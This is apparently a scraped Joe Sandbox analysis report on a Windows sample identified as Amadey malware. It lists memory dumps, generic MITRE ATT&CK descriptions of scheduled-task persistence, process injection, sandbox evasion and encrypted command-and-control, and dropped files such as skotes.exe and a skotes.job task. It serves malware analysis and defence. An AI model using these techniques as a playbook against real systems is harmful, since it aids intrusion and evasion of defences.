Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 480e1af1958ff80bdcabd30c94004865adada1779578f930fce904012f903b22
Instruction ID: be4831b3c192f42f4c1c07c0622f55699728addb0e50f8035a8474b1518bb1ba
Opcode Fuzzy Hash: 480e1af1958ff80bdcabd30c94004865adada1779578f930fce904012f903b22
Instruction Fuzzy Hash: 96E0863444024CBBCB26FA95C847BDC7B6C9B10709F18C121BC10250D19FB497C8DA82

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UyiH4t5dph.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

C:\Windows\Tasks\skotes.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
UyiH4t5dph.exe

Function 002D735A Relevance: 2.5, APIs: 1, Instructions: 1031
COMMON

Function 0030652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 002D9BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Function 002D9F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Function 002DA079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Function 002DA1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Function 002DA418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Function 002DA54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Function 002DA682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Function 002D9ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Function 002DA856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Function 002DA34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Function 0030B04B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON